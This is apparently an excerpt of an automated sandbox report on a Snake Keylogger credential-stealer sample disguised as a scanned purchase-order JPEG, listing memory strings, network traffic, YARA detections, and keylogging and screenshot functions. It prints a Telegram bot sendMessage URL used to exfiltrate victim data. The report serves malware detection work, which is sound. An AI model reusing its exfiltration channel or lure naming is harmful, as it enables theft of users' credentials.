                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81$
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  .NET source code contains very large array initializations
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, formAwesomeness.csLarge array initialization: : array initializer size 684547
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, Program.csLarge array initialization: Program: array initializer size 4956
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A7244 NtQueryInformationProcess,8_2_085A7244
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085AB220 NtQueryInformationProcess,8_2_085AB220
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_056832E00_2_056832E0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_056832D00_2_056832D0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_056832870_2_05683287
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_056808D40_2_056808D4
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C44100_2_0C1C4410
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1CC1280_2_0C1CC128
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C4C800_2_0C1C4C80
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C66580_2_0C1C6658
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C48480_2_0C1C4848
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C68B80_2_0C1C68B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C50B80_2_0C1C50B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C50A80_2_0C1C50A8
